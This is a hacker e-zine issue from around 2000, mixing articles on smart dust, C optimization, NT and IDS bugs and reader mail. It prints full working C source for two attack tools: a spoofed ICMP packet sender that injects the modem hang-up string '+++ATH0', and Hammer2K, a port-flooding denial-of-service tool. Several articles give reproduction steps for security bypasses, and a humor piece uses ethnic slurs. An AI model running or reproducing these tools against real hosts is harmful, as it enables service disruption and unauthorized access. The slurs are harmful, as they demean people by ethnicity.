-------------------------------------------------------------------------------- _ _ _ _ _ | | / ) | | | | (_)_ | | / / ____ ____ ____ | | | |___ ____ ____ ____ _| |_ _ _ | |< < / _ ) _ ) _ \ \ \/ / _ )/ ___) _ |/ ___) | _) | | | | | \ ( (/ ( (/ /| | | | \ ( (/ /| | ( ( | ( (___| | |_| |_| | |_| \_)____)____)_| |_| \/ \____)_| \_||_|\____)_|\___)__ | (____/ -------------------------------------------------------------------------------- I S S U E (9) L e g i o n s o f t h e U n d e r g r o u n d -------------------------------------------------[www.legions.org]-------------- [CONTENTS]------------------------------------------------------------[CONTENTS] [0001]=========================[Editorial - Digital Ebola ] [0010]===========================[Ode to JP Part II - KrankShaft ] [0011]========[Biometric Concepts in UNIX - Digital Ebola ] [0100]====[The Senseless Guide to Modem Commands - fejed ] [0101]============[Hole in CyberCop Monitor 2.0 NT - Proto ] [0110]==================================[Smart Dust - shekk ] [0111]====================[More Bugs In Windows NT - Ntwak0 ] [1000]===================================[Optimizing UNIX C - S ] [1001]===================================[Hammer2K - Threx #include #include #include #include #include #include #include #include #include #include #include #include #include #define VERSION "1.2-05.05" //fixed old compiler compatibility problems #define FRIEND "you" void usage( char *name ); void banner( void ); char *get_progname( char *fullname ); void done( int foo ); void gin( int port, struct sockaddr_in sin, struct sockaddr_in din ); unsigned short in_chksum( u_short *ipbuf, int iplen ); int main( int argc, char **argv ) { struct hostent *sourceinfo, *destinfo; struct sockaddr_in sin, din; int sockfd, numpackets, i; char *target, *source; banner(); ( argc < 4 ) ? 
usage( get_progname( argv[0] ) ) : ( void )NULL; source = argv[1]; target = argv[2]; numpackets = ( atoi( argv[3] ) ); signal( SIGINT, done ); if( ( sourceinfo = gethostbyname( source ) ) == NULL ) { printf( "cannot resolve source host!\n" ); exit( -1 ); } memcpy( ( caddr_t )&sin.sin_addr, sourceinfo->h_addr, sourceinfo->h_length ); sin.sin_family = AF_INET; if( ( destinfo = gethostbyname( target ) ) == NULL ) { printf( "cannot resolve destination host!\n" ); exit( -1 ); } memcpy( ( caddr_t )&din.sin_addr, destinfo->h_addr, destinfo->h_length ); din.sin_family = AF_INET; if( ( sockfd = socket( AF_INET, SOCK_RAW, IPPROTO_RAW ) ) < 0 ) { printf( "Cannot get raw socket, silly ass. You gotta be root!\n" ); exit( -1 ); } printf( "Source Host\t\t: %s\n", inet_ntoa( sin.sin_addr ) ); printf( "Target Host\t\t: %s\n", inet_ntoa( din.sin_addr ) ); printf( "Number\t\t\t: %d\n", numpackets ); printf( "bleh" ); for( i = 0; i < numpackets; i++ ) gin( sockfd, sin, din ); printf( "\n\nsent %d packet%c...done\n", numpackets, ( numpackets > 1 ) ? 's' : ( char )NULL ); return 0; } void usage( char *name ) { printf( "\E[31musage: %s \n\n", name); exit( 0 ); } void banner( void ) { printf( "\nscript [ v%s ] ", VERSION ); printf( "compiled for: %s\n\n", FRIEND ); } char *get_progname( char *fullname ) { char *retval = strrchr( fullname, '/' ); return retval ? 
++retval : fullname; } void done( int foo ) { puts( "Exiting...\n" ); exit( 1 ); } void gin( int port, struct sockaddr_in sin, struct sockaddr_in din ) { char *ginstring = "+++ATH0\r+++ATH0\r+++ATH0\r+++ATH0\r"; char *packet; int total; struct iphdr *ip; struct icmphdr *icmp; size_t msglen = sizeof( ginstring ), iphlen = sizeof( struct iphdr ); size_t icplen = sizeof( struct icmphdr ), timlen = sizeof( struct timeval ); int len = strlen( ginstring ); packet = ( char * )malloc( iphlen + icplen + len ); ip = ( struct iphdr * )packet; icmp = ( struct icmphdr * )( packet + iphlen ); ( void )gettimeofday( ( struct timeval * )&packet[( icplen + iphlen )], ( struct timezone * )NULL ); memcpy( ( packet + iphlen + icplen + timlen ), ginstring, ( len - 4 ) ); ip->tot_len = htons( iphlen + icplen + ( len - 4 ) + timlen ); ip->version = 4; ip->ihl = 5; ip->tos = 0; ip->ttl = 255; ip->protocol = IPPROTO_ICMP; ip->saddr = sin.sin_addr.s_addr; ip->daddr = din.sin_addr.s_addr; ip->check = in_chksum( ( u_short * )ip, iphlen ); icmp->type = ICMP_ECHO; icmp->code = 0; icmp->checksum = in_chksum( ( u_short * )icmp, ( icplen + ( len - 4 ) ) ); total = ( iphlen + icplen + timlen + len + 16 ); sendto( port, packet, total, 0, ( struct sockaddr * )&din, sizeof( struct sockaddr ) ); free( packet ); } unsigned short in_chksum( u_short *ipbuf, int iplen ) { register int nleft = iplen; register int sum = 0; u_short answer = 0; while( nleft > 1 ) { sum += *ipbuf++; nleft -= 2; } if( nleft == 1 ) { *( u_char * )( &answer ) = *( u_char * )ipbuf; sum += answer; } sum = ( sum >> 16 ) + ( sum + 0xffff ); sum += ( sum >> 16 ); answer = ~sum; return( answer ); } ------------------------------------------------------------------------------- [Hole in CyberCop Monitor 2.0 NT]========================================[Proto] Lately there's been alot of hype around IDS technology and for the most part it works quite well if immplemented properly. There are basically 2 types of IDS systems out there. 
Host based and Network based. Both of them have their advantages and disadvantages, but this article is about one particular IDS product by Network Associates called CyberCop Monitor 2.0 NT. This is a hybrid host-based IDS product. For those of you who are unfamiliar with what IDS is, please refer back to kv-8 for a brief summary of IDS technology. One of the features they claim is its ability to monitor files for illegal changes, and not only to warn the admin but also to change the file back to its original form. This makes it a great preventative measure for web admins trying to protect their web sites from being defaced. In my testing I applied a simple rule for it to follow. I had it monitor a file I created and applied a policy for it to do 2 things upon file access. 1. Replace file to its original form. 2. Local Pop-Up Alert on this system being attacked. The product works great except under one condition that I have found so far, which I was shocked to find. It's nothing fancy like exploiting a particular DLL to upload the changed file; no, it's much simpler than that. Believe it or not, to overcome this feature, all you have to do is FTP the modified file to the system with CyberCop Monitor, and although it will warn you of the modified file, it cannot automatically replace the file back to its original form. The folks over at NAI have been informed and I was assured that they are working on a solution to the problem, but at the time of this publication the hole within their product still exists. [Smart Dust]=============================================================[shekk] Technology is at a point where it is thought possible (and almost done) that we can have a completely independent node inside of 1 cubic mm. These "dust motes" will include power supply, circuits, communication, and sensors.
The possibilities this could bring are endless, from spying to gathering weather data. Dust motes will be able to communicate with a bi-directional radio or lasers. Protocols and systems for these dust motes to communicate with a laser network are being designed to implement a way for dust motes to talk to each other. Even the top notch radio hardware that we have in today's robust radio industry still uses up a lot of power. Because of this, they have decided to use a laser network for most communication, utilizing lasers much smaller than the laser pointers you might have seen for around 10 dollars. This means, even if one mote is not sensing very much data, they could work together in say a room, and collect their data together. Right now, macro motes have been created as large scale models of the smart dust of the future. Most of them are about 1 inch long. They can have sensors for humidity, barometric pressure, tilt, vibration, magnetic fields, and light. Macro motes include a bi-directional radio, microprocessor, and a battery which will let them live about a week, and then for another 2 years with a 1% duty cycle. Other accomplishments include a 21 km range with laser, which i will talk about in more detail later. Now here is a list of the current macro motes that have been designed and tested; these are all giants compared to what dust motes are expected to be in 2001. [List of Macro Motes with features] - RF mote { RF 916.5MHz, 5k bps with 20 meter range. Sensors - 2 axis magnetometers, 2 axis accelerometers, light, temperature, pressure } Laser mote { Long range laser transmission of data from sensors, many kilometers in range. This is one of the motes that was used to show the range of laser transmission in the experiment to transmit weather data. Sensors - temperature, light, pressure, humidity. } CCR mote { Corner cube reflector/light receiver communication range depends on laser.
This is the technology that will hopefully be implemented in the smart dust of the future for communication with each other. Sensors - temperature } Mini mote { This is a miniature version of the RF mote. RF 916.5MHz with a 10kbps 20 meter range. Sensors - temperature } MALT { This has steerable laser beam communication with a CCD camera. Sensors - light } weC { This is the next version of the mini mote; it can be reprogrammed wirelessly and has RF 916.5MHz with a 10kbps 20 meter range. Sensors - light, temperature. } IrDA mote { These can communicate with any infrared device, such as the palm pilot. Sensors - temperature } Laser communication. Using an optical receiver with the CCD camera, connected to a laptop, these lasers can get analog data from any of the sensors and send it digitally to the laptop. This procedure can simultaneously receive data from about 20 nodes using CRC error correction for accurate reception. As of now, this communication is very slow; when they were sending the weather data, they were getting about 8 bits a second. Experiment - They stripped off the bi-directional radio and connected a laser pointer up to a weather sensing node, and had a CCD camera capturing frames to a laptop. 21 km away they could send data with these lasers (using something to make the spot bigger). This means not only do the lasers take up less power, but they also have a much larger range than what could be imagined when it comes to broadcasting radio waves out of a cubic-millimeter machine. They have already designed and fabricated sub mm scale mirrors with 2 motors all on the same chip, which will be used for aiming the laser beams. Tests have also been conducted and found that these tiny lasers can transmit millions of photons per second. There are light detectors that can detect 1 single photon (a photon is like one packet of light, read brief history of time by stephen hawking).
They believe that these little boogers will be able to communicate with low earth orbit satellites, which gives us even more possibilities. HOW SO SMALL? There is something called IC fabrication. It allows you to have a scale of say 1cm long, and then image it down to the sub-millimeter scale. This is how they are carving sub-millimeter sized circuits. Here is a link to a nice picture of what a dust mote's structure will be. http://robotics.eecs.berkeley.edu/~pister/SmartDust/figures/colormote.gif Some accomplishments with this fabrication technique include synthetic maple seeds, where they used a honeycombed piece of silicon .1mm thick and carved out a wing, then put a tiny piece of silicon on the bottom so that it would auto rotate as it fell. In 2001, they should have dust motes the size of dust, small enough that they can be suspended in air just like dust, small enough that no one would notice. Little motors have already been thought of, so these motes could also be controlled around. POSSIBILITIES These little bitches could fall into the wrong hands, and we could have a real life version of the book 1984, where the government watches us all day long and commands us to do things over speakers on a dust mote's back. Or like screamers where the robots take over and end up killing people, but i wouldn't worry too much about that, you and your desktop are smarter than dust motes ;) Holding back from thinking what could go wrong with advanced technology like this, there could be some very neat applications for these. You could have these monitoring things, from your goods you are shipping, or use these as controls on your fingertips with the accelerometers, for computers, or even games. Virtual Reality that knows your exact motions. Now, here are credits to the designers of smart dust, who not only are designing these neat little creatures at the University of California, but are putting up information on leeto websites for people like me to find and enjoy reading.
Without these guys web page teqneeqs, none of this information would be coming to you right now. Bryan Atwood Colby Bellew Lance Doherty Seth Hollar Matt Last Brian Leibowitz Wei Mao Lilac Muller Junichi Nishimoto Dana Teasdale Brett Warneke Xiaoming Zhu - thank you expecially for replying to my emails. my plugs - shouts to all of gH, LoU, and a special shout to ging3r www.pure-security.net www.elucks.org www.hack.co.za [More Bugs In Windows NT]===============================================[Ntwak0] Subject: Password problem In NT when connecting to a share, should I say you do not need a password in some cases even if it is protected I mean :) Monday, December 27, 1999 by NtWaK0 Tested on NT 4.0 +SP6 + SP6a. I will try to do it by example in this case you will be able to repeat it --> I am going to map a network share call it X: E:\Tmp>net use x: \\1.1.1.1\tmp passwordhere /user:ntwak0 The command completed successfully. --> I done net view to see the shared resources E:\Tmp>net view \\1.1.1.1 Shared resources at \\1.1.1.1 Share name Type Used as Comment -------------------------------------------------------------------------------- Tmp Disk X: The command completed successfully. --> Now I copyed a file to X: to use the 1.1.1.1 resources. E:\Tmp>copy test.txt x: 1 file(s) copied. --> Now I delete the connection I created to 1.1.1.1 using X: E:\Tmp>net use /delete x: x: was deleted successfully. --> Now I tryed to recreate the connection using NULL password just for fun i w as doing this E:\Tmp>net use x: \\1.1.1.1\tmp "" /user:ntwak0 System error 1326 has occurred. Logon failure: unknown user name or bad password. E:\Tmp> --> It is normal I could not login now I done The Bug: --> Now Reconnect using the command line E:\Tmp>net use x: \\1.1.1.1\tmp passwordhere /user:ntwak0 The command completed successfully. 
--> I used Explorer to copy the same file test.txt from my drive E:\tmp to the mapped drive X: --> I got a msg saying "The file already exist do you wana overwrite it?" I said yes, well it is normal I did copy it before as you saw in the step above . --> After copying the file in explorer I did right click on X: (the mapped drive) and disconnect --> I got a msg box saying "There are currently files open on X: (connected to \\1.1.1.1\tmp). If you do close the files before disconnecting from the network, data may be lost. Do you want to disconnect the device anyway?" Then I clicked Yes in this case I have no more connection mapped to X: In this case I should not be able to connect without password or username but not true ;) --> Next I do not know what I tried it I guess for fun In DOS window I typed E:\Tmp>net use x: \\1.1.1.1\tmp "" /user:ntwak0 The command completed successfully. --> W00t I was able to login I did not believe hehe with no password. --> To make sure i was not dreaming or missing sleep, I was able to repeat it like 10 times. But if you do connect and disconnect using net use /delete x: this will work and you cannot connect with no password like the explore case. So you this is a security bug that you can reproduce it in explore and DOS command and it has to follow certain steps . What do I mean by that ? well you have to disconnect using explore and when you get the msg saying : "There are currently files open on X:(connected to \\1.1.1.1\tmp) blah blah... In that case if you disconnect and reconnect right after using no password that should work. ;) But if you do it all from the command line this should not work and that is normal. Here is an example done all by command line: E:\Tmp>net use x: \\1.1.1.1\tmp " q]a'z/ " /user:ntwak0 The command completed successfully. E:\Tmp>copy test.txt x:test.txt 1 file(s) copied. E:\Tmp>net use /delete x: x: was deleted successfully. E:\Tmp>net use x: \\1.1.1.1\tmp "" /user:ntwak0 System error 1326 has occurred. 
Logon failure: unknown user name or bad password. E:\Tmp> Cheers, |-+-||-+-|-+-|-+-|oOo-(NtWaK0)(Telco. Eng. Etc..)-oOo|-+-|-+-|-+-||-+-| The only secure computer is one that's unplugged, locked in a safe, and buried 20 feet under the ground in a secret location... and i'm not even too sure about that one"--Dennis Huges, FBI. |-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-||-+-||-+-| Live Well Do Good --:) ================================================================================ Subject: IE5 and The Cool Return Download and Installation Successful Friday, December 03, 1999 It was late about 3 am and a lot of coffee in my blood, so i decided to do some IE5 Active update to relax from what I was working on. :) So i clicked IE5, clicked http://windowsupdate.microsoft.com/default.htm?Page=productupdates --> Got a nice Windows :) Please Wait... Windows Update is customizing the product updates catalog for your computer. This is done without sending any information to Microsoft --> IE5 come up with (Main windows) Windows NT 4.0 Service Pack 5 (128 bit strong encryption) 456 KB/ Download Time: < 1 min Windows NT 4.0 Service Pack 5 includes the most recent updates and enhancements to Windows NT Server 4.0 and Windows NT Workstation 4.0. Service Pack releases are cumulative, so Service Pack 5 contains all previous Service Pack fixes and any new fixes created after Service Pack 4. Note that the actual download will be anywhere from 11-32Mb depending on the actual files on your current machine. This release features 128 bit strong encryption and can only be downloaded within the United States and Canada --> I clicked to check Windows NT 4.0 Service Pack 5 (128 bit strong encryption) --> I clicked on the Download (blue) button to start download Product Updates Download Checklist 1 Confirm Selections You have chosen to install the following software. You can deselect any of the components you do not want to install by clearing the check box. 
Total Size: 456 KB Download Time: < 1 min Windows NT 4.0 Service Pack 5 (128 bit strong encryption) 456 KB/ Download Time : < 1 min 2 View Instructions? View a single, combined instruction page for all of the software you have chosen to install. You may want to print these instructions for later reference. View Instructions 3 Start Download Download and install the software shown above. --> I clicked Start Download --> I got another windows SUPPLEMENTAL END USER LICENSE AGREEMENT FOR MICROSOFT SOFTWARE IMPORTANT: READ C AREFULLY - --> I clicked YES After downloading the file, I got another HAHAHA nice Service Pack Setup Error ( Modal Window) "The version of Windows NT you have installed is more current than the update you are trying to install" WITH THE OK button --> I clicked OK --> I got Product Updates Download and Installation Successful SUCCESSFUL The following software was successfully downloaded and installed. Windows NT 4.0 Service Pack 5 (128 bit strong encryption) HAHA now let me tell you what i see wrong in that HAHA now let me tell you what i see wrong in that 1- The updates did not install So i should not be getting "Download and Installation Successful SUCCESSFUL" 2- Why the script did not detect that i have SP6 when it started ? bah... they should be checking first, and when they find that I have Sp6, they should not propose the option of getting the patch "Windows NT 4.0 Service Pack 5 (128 bit strong encryption)" I did not try this on win9x, or other IE. Cheers, +-------------oOo-(NtWaK0)(Telco. Eng. MCSE.Etc..)-oOo-------------+ The only secure computer is one that's unplugged, locked in a safe, and buried 20 feet under the ground in a secret location... and i'm not even too sure about that one"--Dennis Huges, FBI. 
+--oOo-"---------------------------------------------------"-oOo---+ Live Well Do Good --:) ================================================================================ Subject: PGP 6.5.2 for Windows will change some security setting if you re-install it Tuesday, December 07, 1999 Tested on NT 4.0 + SP6 + IE5.01 Today I had a funny problem with PGP 6.5.2. I was working and decided to wipe out some files. --> I selected the files to wipe out --> Right click on the selected files, and Clicked PGP then Clicked Wipe --> Hmm funny the PGP Wipe dialog box come up but EMPTY. --> I thought i am to much backed ;) but I done it again and selected others files in the same directory --> Hmm funny the PGP Wipe dialog box come up but EMPTY. --> Well I decide to re-install PGP 6.5.2 --> After the install I still cannot wipe the files. --> I continued working and wiped the files using the PGP tool menu , heh that works --> After some time I decide to find out how come that sh** is not working. --> After some time I decide to find out how come that sh** is not working. --> So i selected on file form the same directory as before, and right click the file then properties --> Hmm the file is READ Only so I check that OFF --> Right click on the selected files, and Clicked PGP then Clicked Wipe --> It worked, ;) I was able to wipe the file. So when the file is read only PGP do not display that in the wipe Dialog box. Now after I re-installed PGP hehe for nothing, I opened my e-mail outlook 2000 and send some e-mails. Hrmm when i clicked the SEND button I noticed something funny, I SIGN all my e-mail and when I clicked the SEND I did not get the SIGN dialog box to type in my pass phrase so I said heh PGP changed my settings. So from outlook 2000 Menu I clicked PGP then Option then E-mail TAB and under e-mail options SIGN New messages by default was UNCHECKED. And I am like 100 % sure I had it checked before. I consider is the security issue and here is why ? 
: Imagine you done that re-installed PGP and you had your settings to sign all your mail by default, and after you re-installed you SENT THE MOST LEGAL ELITE Mail and you clicked SEND and you did not realize that the mail was not signed. So one day you need that mail as proof, but you opened the mail and you was lik e 100 % sure it was signed by you, but you could not find the signature ;) I am sure situations like this will get you mad. ? [Optimizing UNIX C]==========================================================[S] Possessing UNIX C optimization skill can be prove to be useful in many situations. An enumaration of such instances follows: - Resource intensive projects - Writing code to be executed on a slow processor - Interactive web sites for use by the masses - Obsession with elegance This abridged document is by no means a definitive reference; it is only an introduction. The "Resources" section appended to this document contains other quality sources. My personal interest in C optimization began as the result of this proprietary programming endeavor: http://www.freezersearch.com/index.cfm?aff=dhc Buffering I/O ------------- Minimizing I/O can improve code performance significantly, especially when dealing with disks. Buffering I/O will reduce a disk's workload and the number of system calls that need to be executed. Take the following pseudo-code that reads 1024 bytes, for example: while(cnt<1024){ ... read(fd,&c,1); ... } read(fd,&buf,1024); In the first model, 1,024 system calls have to be made and a seperate disk operation has to be made for each one of those. In other words, the hard drive platters have to spin to the requested position of the file on disk for each individual read() call. 
Here's a real-world example of buffering efficency: [super@ufo super]$ perl -e 'print "A"x65535;' > /tmp/test [super@ufo super]$ cat prog1.c #include #include int main(void){ int fd; unsigned char c; register unsigned short cnt; if((fd=open("/tmp/test",O_RDONLY))<0){ exit(EXIT_FAILURE); } cnt=0; for(cnt=0;cnt<65535;cnt++){ read(fd,&c,1); } exit(EXIT_SUCCESS); } } [super@ufo super]$ cc -o prog1 prog1.c [super@ufo super]$ cat prog2.c #include #include int main(void){ int fd; unsigned char c; char buf[65535]; if((fd=open("/tmp/test",O_RDONLY))<0){ exit(EXIT_FAILURE); } read(fd,&buf,65535); exit(EXIT_SUCCESS); } [super@ufo super]$ cc -o prog2 prog2.c [super@ufo super]$ time ./prog1 0.06user 0.05system 0:00.10elapsed 108%CPU (0avgtext+0avgdata 0maxresident)k 0inputs+0outputs (75major+9minor)pagefaults 0swaps [super@ufo super]$ time ./prog2 0.00user 0.00system 0:00.00elapsed 0%CPU (0avgtext+0avgdata 0maxresident)k 0inputs+0outputs (75major+24minor)pagefaults 0swaps Buffer efficiency is noticable even at 448.92 BogoMIPS. Obviously, prog1 is frivolously wasting resources. Although prog2 has to allocate memory for the character array, this is a fair trade for extraneous disk activity and wasted CPU cycles. Most buffers will have a short lifespan and may be freed rather quickly. Thus, the used memory will have little or no effect on operation. Be careful when utilizing this technique. If any of the memory space of the allocated buffer is swapping, this method's purpose has been defeated. Why read from the disk when an immediate write of identical data is pending? In short, don't use excessively large buffers. Loop unrolling -------------- Loop unrolling is the expansion of consolidated recurring code. A decent amount of processing can be eradicated by spreading out loop code. Loop unrolling cut back on incremental math, memory used by integers for counting, and ASM instructions that handle recursion (JMP, JBE, etc.) 
/* Hence, */ while(cnt<1000){ puts("Hello World"); puts("Hello World"); puts("Hello World"); puts("Hello World"); puts("Hello World"); puts("Hello World"); puts("Hello World"); puts("Hello World"); puts("Hello World"); puts("Hello World"); cnt+=10; } /* is superior to */ while(cnt<1000){ puts("Hello World"); cnt++; } Lazy programmers may use the -funroll-loops option of egcs. Bitfields --------- Often, a coder may need to set an on/off flag for use in a conditional statement. The disturbing part is that most coders declare an integer with which to do this. How stupid. How lame. How wasteful. This has already been done with base 2 (binary). Instead of allocating the sizeof(int), usually four bytes (32 bits), perform the operation with a single bit. This can be accomplished using structures. struct bitfields { int flag1 : 1; } The preceding structure decleration tells the compiler to set aside one bit for the flag1 variable. This syntax may also be applied when declaring an integer with a known value limit. For example, a variable used for counting that never exceeds 15 would only need a nibble to do its job. Therefore, it may be declared within a structure as so: "int flag : 4;". Anyone with bits and bytes mentality knows that a nibble is half a byte. On most architectures, a byte is 8 bits so a nibble is 4 bits. Only 4 bits are needed to count to fifteen because of binary fundamentals: 1 + 2 + 4 + 8 = 15. LWPs ---- Lightweight processes, otherwise known as threads, can make use of the wasted time that a program spends blocking, or sitting idle while waiting for a certain event. Additionally, threads can extinguish the overhead of creating a new, "heavyweight" process. Lightweight processes share memory space with the main process, consequently throwing IPC (Inter-Process Communication) out the window. Hence, the Linux move towards clone(). 
Optimization through debugging ------------------------------ Examining the output of programs such as strace, ltrace, ktrace, and truss can aid in the discovery of superflous system and library calls, ASM commands, etc. In general, the less output generated by a tracing debugger, the more efficient the code. Ramdisks -------- A ramdisk, as the name implies, is a filesystem in RAM. Ramdisks have a multitude of optimization applications; the implementation of a speedy cache system and minimizing the cost of dynamic configuration files, to name a few. Any sensible computer user knows that reading from RAM is remarkably faster than reading from disk. Summaraziation of ramdisk usage will not be provided. Other documents fully address this subject. Registers --------- Variables with frequent usage should be declared with the register keyword; examples are loop counters and character pointers used for intricate lexical analyzation. A classic case is illustrated in the "Buffering I/O" section above. This rule of thumb should be known by programmers even with a rather small amount of experience with C. Resources --------- FTP: ftp.debian.org /debian/dists/unstable/main/source/utils/ltrace_* FTP: scitsc.wlv.ac.uk /pub/cprog/prog.course.wlv./chapter.12 WWW: http://rpmfind.net/linux/RPM/Development_Debuggers.html WWW: http://centaurus.cs.umass.edu/~wagner/threads_html/tutorial.htm WWW: http://www.abarnett.demon.co.uk/tutorial.html USENET: comp.lang.c, comp.programming.threads Manual pages: ltrace(1), strace(1), ktrace(1), truss(1) [Hammer2K]===============================================================[Threx] /* Hammer2K ver 1.0 BETA by Threx (threx@attrition.org) I'm new to socket programming... So bare with me. Hammer2K is a simple DoS attack tool that will kill a port by rapidly opening a port and sending a burst of data. It affects major ports such as telnet, finger, and smtp. Because inetd checks the status of these ports, it will restart in 10 minutes. 
So, I have armageddon mode that will keep killing it for an hour. Problems: If the victim has more bandwidth, it can't be killed. You can have a group of people to take it out, but I haven't tested that theory. Coming Up: Hammer2K will soon be a DDoS attack tool. Hopefully more ports will be found that are affected. Compile: gcc hammer2k.c -o hammer2k Greets: #svun on undernet, LoU, APHC */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include char *msg = "123456789123456789123456789123456789123456789123456789"; int sock; int X; int p; int l; int len; int a; int Usage(char *ARG); int tcp(void); int armageddon(void); struct hostent *he; struct sockaddr_in target; int main(int argc, char *argv[]) { if (argc < 4) { Usage(argv[0]); } if ((he=gethostbyname(argv[1])) == NULL) { printf("\n ERROR: hostname lookup failed \n"); exit(1); } if (strcmp(argv[2], "-telnet")==0) { p = 23; l = 1800; } else if (strcmp(argv[2], "-pop2")==0) { p = 109; l = 3000; } else if (strcmp(argv[2], "-imap2")==0) { p = 143; l = 4000; } else if (strcmp(argv[2], "-finger")==0) { p = 79; l = 1400; } else if (strcmp(argv[2], "-smtp")==0) { p = 25; l = 740; } else if (strcmp(argv[2], "-ftp")==0) { p = 21; l = 800; } else if (strcmp(argv[2], "-pop3")==0) { p = 110; l = 1350; } else if (strcmp(argv[2], "-netstat")==0) { p = 15; l = 1300; } else { printf("\n ERROR: Hammer2K doesn't support that service. 
\n"); } if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) { printf("\n ERROR: fatal socket error \n"); exit(1); } target.sin_family = AF_INET; target.sin_port = htons(p); target.sin_addr = *((struct in_addr *)he->h_addr); if (connect(sock, (struct sockaddr *)&target, sizeof(target)) == -1) { printf("\n ERROR: fatal connection error \n"); exit(1); } a = atoi(argv[3]); if (strcmp(argv[3], "-A")==0) { armageddon(); } else if (strcmp(argv[3], "-NA")==0){ tcp(); } else { printf("\n ERROR: please use -A (Armageddon ON) or -NA (Armageddon off) \n"); } } int Usage(char *ARG) { printf("\n\n Hammer2K by Threx "); printf("\n Usage: hammer2k "); printf("\n :::: "); printf("\n 0.0.0.0 "); printf("\n target.net "); printf("\n\n :::: "); printf("\n -netstat "); printf("\n -ftp "); printf("\n -telnet "); printf("\n -smtp "); printf("\n -finger "); printf("\n -pop2 "); printf("\n -imap2 "); printf("\n -pop3 "); printf("\n\n :::: "); printf("\n -NA = Armageddon Mode Off"); printf("\n -A = Armageddon Mode On\n\n"); exit(1); } int armageddon(void) { int loop; int number; loop = 10; printf("\n\nHammer2K by Threx "); printf("\nHomepage http://inferno.tusculum.edu/~threx"); printf("\nArmageddon Mode is [ON] (This will kill a port for one hour)\n"); printf("\n\nFlooding port......\n\n"); for(number = 1; number < loop; number++) { for(X = 1; X < l; X++) { if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) { printf("\n ERROR: fatal socket error \n"); exit(1); } target.sin_family = AF_INET; target.sin_port = htons(p); target.sin_addr = *((struct in_addr *)he->h_addr); if (connect(sock, (struct sockaddr *)&target, sizeof(target)) == -1) { goto timer; } if ((send(sock, msg, len, 0)) == -1) { printf("\n ERROR: fatal send error \n"); exit(1); } len = strlen(msg); send(sock, msg, len, 0); close(sock); } timer: system("sleep 600"); } printf("\n Port %d has been killed for one hour. 
\n\n", p); close(sock); return 0; } int tcp(void) { printf("\n\nHammer2K by Threx "); printf("\nHomepage http://inferno.tusculum.edu/~threx"); printf("\nArmageddon Mode is [OFF]]\n"); printf("\n\nFlooding port......\n\n"); for(X = 1; X < l; X++) { if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) { printf("\n ERROR: fatal socket error \n"); exit(1); } target.sin_family = AF_INET; target.sin_port = htons(p); target.sin_addr = *((struct in_addr *)he->h_addr); if (connect(sock, (struct sockaddr *)&target, sizeof(target)) == -1) { printf("\n Port %d: Killed \n", p); exit(1); } if ((send(sock, msg, len, 0)) == -1) { printf("\n ERROR: fatal send error \n"); exit(1); } len = strlen(msg); send(sock, msg, len, 0); close(sock); } printf("\n Port %d: Port assumed to be open. \n\n", p); close(sock); return 0; } [Hax0ring the Slurpee]===============================================[Phriction] ITEMS NEEDED: At least $.79 and a local 7-11 Slurpee's are God's gift to man and no they were not invented by the indian people Abdul and his friends didn't event slurpee's once when a long time ago something I like to dream about now and then, 7-11's were run by english speaking folk, yes you may not believe me but it is true. Now $.79 for enjoyment that will last the whole day? I mean thats better than someone making their root passwd root.... well almost. But now onto the gritty stuff most people think slurpee's are easy to make they think they get the most for their $.79 or at most $1.19 for the 40oz. but they don't yes good old Abdul and his friends ripped you off you think they would put instructions on how to make one on the machine but no they don't want you to know these secrets. Yes I have been banned from many 7-11's for finding out these secrets and also for such antics as "wheezing the juice", so friend I want you not to take this file lightly. 
I think the toughest part to is choosing your flavors, if you only put one or two flavors in your slurpee you don't deserve to live, a slurpee was made for mixing many flavors one of my favorites is Kiwi Strawberry, now remember always put your favorite flavor second for optimal taste put your least favorite last on top, second favorite first third favorite third and anything after that just goes up in ascending order. Next the lid you shouldn't put your last flavor in till you have placed the lid on, then fill it up to the top(NOTE TO READER: I usually like to sample flavors after i add them stating in a loud voice mmmmm that was good, or ahh that one is just ok and if they are ringing up another customer feel free to wheeze the juice(wheezing the juice is placing your open mouth under the slurpee dispenser while unloading as much slurpee down your throat as you can fit very fun but painful brain freezes)) now most people think that after this they are down and thats what Abdul wants you to think but you are wrong trapped inside the layers of slurpee is air, proceed to stir the middle and watch as magically your slurpee cup has more room WOW, REALLY? Yes really then goto the counter and smile big as you gladly hand Abdul your money. Another cool trick if Abdul has another customer get one of those big 64 oz. pop cups fill it up and pay the price of $.99 for a 64 oz. slurpee or if you're not feeling lucky add a little pop on top abdul will never know. WARNING: Repeatedly wheezing the juice on the same visit can be harmful to your health. [Spam]=============================================================[The Readers] Date: Sat, 20 May 2000 14:37:06 -0400 (EDT) From: Jessica McAllister To: digiebola@hackphreak.org Subject: sure i'm from colorado and where might you be from?
/* h0h0h0h0 */ Date: Sat, 27 May 2000 07:23:18 -0400 (EDT) From: Algerian Hacker To: digiebola@hackphreak.org, truedog@legions.org, lothos@rootfest.org Cc: thegnome@nmrc.org Subject: Pleas Help Hello, I am an Algerian Hacker, please tell me how to hack or Crack a protected directori in a server or can you hack it and give the password & username or the file, thanks Algerian Hacker dzhack@mail.com /* No, we will not hack things for you. You should really be more specific, bad English aside, `directori in a server` could mean almost anything. */ Date: Mon, 5 Jun 2000 14:40:42 -0700 (PDT) From: x-empt@ispep.cx To: Rumy Mirza Cc: digiebola@hackphreak.org, deth@errata.net, truedog@legions.org, fejed@legions.org, lothos@rootfest.org, shadows@legions.org, x-empt@ispep.cx Subject: Re: hack ISP Hi Rumy, What you seek is the "Land of Scripts and Childish Fun" also known as "Script-Kiddie Land". I went there once to explore, but quickly found out that the rollar coasters were made of tinfoil and if I were to ride one, I would quickly fall to the theme park below Script-Kiddie Land, known as Big Brother Land. Big Brother will catch you and break your fall, but then he will do some anal probes and see if you are the right type of person for his Area 51 program. (See attachded) If you are made of the right stuff, then you will probably get to travel to distant galaxies and visit planets with little E.T.-like creatures running around, but if you fail Big Brother's test, you are sent to Hell, also known as prison to the American public. (See attached) In Hell you receive deluxe accomodations for eternal anal probing action. You must chose your path wisely my son. x-empt On Tue, 6 Jun 2000, Rumy Mirza wrote: > Hi , > I want a programe / method by which i could get usernames and passwords from my ISP (internet service provider). In short I want free internet connections. 
